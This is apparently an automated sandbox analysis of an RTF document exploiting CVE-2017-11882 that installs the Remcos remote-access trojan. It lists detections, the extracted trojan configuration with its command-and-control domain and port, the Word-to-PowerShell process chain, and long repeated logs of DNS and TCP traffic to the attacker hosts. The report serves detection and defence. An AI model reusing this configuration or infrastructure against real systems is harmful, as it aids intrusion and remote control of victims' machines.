                2024-09-27T14:01:09.705313+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49176 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:12.307814+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49177 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:14.815580+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49178 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:17.339635+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49179 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:01:19.774757+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49180 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:02:22.430608+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49181 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:04:13.637193+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49182 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:04:17.612389+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49183 | 192.3.101.29 | 14645 | TCP
                2024-09-27T14:00:18.336027+0200 | 2049038 | 1 | A Network Trojan was detected | 207.241.227.96 | 443 | 192.168.2.22 | 49162 | TCP


                AV Detection

                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf, Avira: detected
                Source: C:\Users\user\Desktop\~WRD0000.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf, ReversingLabs: Detection: 50%
                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                Source: powershell.exe, 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_308a5491-8

                Exploits

                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Source: Static RTF information: Object: 0 Offset: 0000569Dh
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 185.235.137.223 Port: 80
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.dr, Stream path '_1788929161/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.dr, Stream path '_1788929198/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                Source: unknown, HTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global traffic DNS query: name: ia601706.us.archive.org
                Source: global traffic DNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global traffic TCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global traffic TCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
